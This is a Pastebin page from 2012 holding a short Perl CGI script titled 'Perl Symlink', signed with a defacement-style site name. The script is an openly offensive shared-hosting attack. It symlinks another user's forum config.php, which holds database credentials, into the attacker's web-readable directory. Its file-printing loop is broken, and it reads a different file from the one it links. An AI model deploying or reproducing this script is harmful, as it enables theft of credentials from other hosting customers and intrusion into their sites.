lehieuit

Perl Symlink

May 6th, 2012
287
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 0.32 KB | None | 0 0
  1. #!/usr/bin/perl
  2. # izocin emmi
  3. # www.redsecurity.iblogger.org
  4. # hadi gulum gorum seni
  5. symlink ("/home/kurbanuser/public_html/forum/includes/config.php","/home/sizinuser/public_html/izo.txt");
  6. print "Content-type: text/html\\n\\n";
  7. open (THISFILE,"aria.txt");
  8. foreach $line()
  9. {
  10. print "$line<br>\\n";
  11. }
  12. close (THISFILE);
Advertisement
Add Comment
Please, Sign In to add comment